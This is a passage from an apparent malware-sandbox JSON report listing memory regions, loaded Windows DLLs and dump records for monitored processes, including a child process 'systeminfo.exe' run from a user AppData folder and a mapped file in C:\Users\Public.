"cfgmgr32.dll", "norm_filename": "c:\\windows\\syswow64\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1988755456, "timestamp": "00:00:39.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989148672, "type": "region", "version": 1 }, "end_va": 1990840319, "entry_point": 1989148672, "filename": "\\Windows\\SysWOW64\\setupapi.dll", "id": "region_1240", "name": "setupapi.dll", "norm_filename": "c:\\windows\\syswow64\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989148672, "timestamp": "00:00:39.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1992425472, "type": "region", "version": 1 }, "end_va": 1992499199, "entry_point": 1992425472, "filename": "\\Windows\\SysWOW64\\devobj.dll", "id": "region_1241", "name": "devobj.dll", "norm_filename": "c:\\windows\\syswow64\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1992425472, "timestamp": "00:00:39.785", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001242-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_1242", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:39.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 0, "filename": null, "id": "region_1243", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:39.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2236415, "entry_point": 0, "filename": null, "id": "region_1244", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:39.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 47841280, "type": "region", "version": 1 }, "end_va": 51982335, "entry_point": 0, "filename": null, "id": "region_1245", "name": "pagefile_0x0000000002da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 47841280, "timestamp": "00:00:39.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1970089983, "entry_point": 1969553408, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1246", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:00:39.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_1247", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:00:39.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1951596544, "type": "region", "version": 1 }, "end_va": 1952600063, "entry_point": 1951596544, "filename": "\\Windows\\SysWOW64\\propsys.dll", "id": "region_1248", "name": "propsys.dll", "norm_filename": "c:\\windows\\syswow64\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1951596544, "timestamp": "00:00:39.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1958084608, "type": "region", "version": 1 }, "end_va": 1958219775, "entry_point": 1958084608, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1249", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1958084608, "timestamp": "00:00:39.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1991311360, "type": "region", "version": 1 }, "end_va": 1991593983, "entry_point": 1991311360, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1250", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1991311360, "timestamp": "00:00:39.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2637823, "entry_point": 2621440, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_1251", "name": "cversions.1.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:00:39.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2838527, "entry_point": 2686976, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db", "id": "region_1252", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:00:39.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 11730944, "type": "region", "version": 1 }, "end_va": 11735039, "entry_point": 0, "filename": null, "id": "region_1253", "name": "pagefile_0x0000000000b30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11730944, "timestamp": "00:00:39.889", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001254-addr_0x00000000028d0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 42795008, "type": "region", "version": 1 }, "end_va": 43847679, "entry_point": 0, "filename": null, "id": "region_1254", "name": "private_0x00000000028d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42795008, "timestamp": "00:00:39.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2637823, "entry_point": 2621440, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1257", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:00:39.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 11796480, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 11796480, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1258", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 11796480, "timestamp": "00:00:39.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 11993088, "type": "region", "version": 1 }, "end_va": 12009471, "entry_point": 11993088, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1259", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 11993088, "timestamp": "00:00:39.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 34889727, "entry_point": 34471936, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1260", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:00:39.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 12058624, "type": "region", "version": 1 }, "end_va": 12062719, "entry_point": 0, "filename": null, "id": "region_1262", "name": "pagefile_0x0000000000b80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12058624, "timestamp": "00:00:39.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1958043647, "entry_point": 1957953536, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1303", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:00:39.992", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_6", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001304-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1304", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:40.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001305-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1305", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:40.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1306", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:40.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1307", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:40.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1308", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:40.012", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001309-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:40.012", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001310-addr_0x00000000002e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_1310", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:40.013", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001311-addr_0x0000000000be0000-size_0x000000000001f000-perm_rwx.bin", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1311", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:00:40.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1312", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:40.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1313", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:00:40.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1314", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:40.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001315-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:40.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001316-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1316", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:40.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001317-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1317", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:40.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1318", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:40.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001319-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1319", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:40.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1320", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:40.016", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001321-addr_0x0000000000560000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_1321", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:00:40.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1322", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:40.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1323", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:00:40.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1324", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:40.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1325", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:40.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1326", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:40.039", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001327-addr_0x0000000000120000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:40.039", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001328-addr_0x0000000000760000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:40.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954877439, "entry_point": 1954715788, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_1329", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:40.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955143679, "entry_point": 1954953201, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_1330", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:00:40.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1955201024, "type": "region", "version": 1 }, "end_va": 1955282943, "entry_point": 1955205952, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_1331", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1955201024, "timestamp": "00:00:40.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1332", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:40.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1333", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:40.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1334", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:00:40.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1335", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:00:40.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 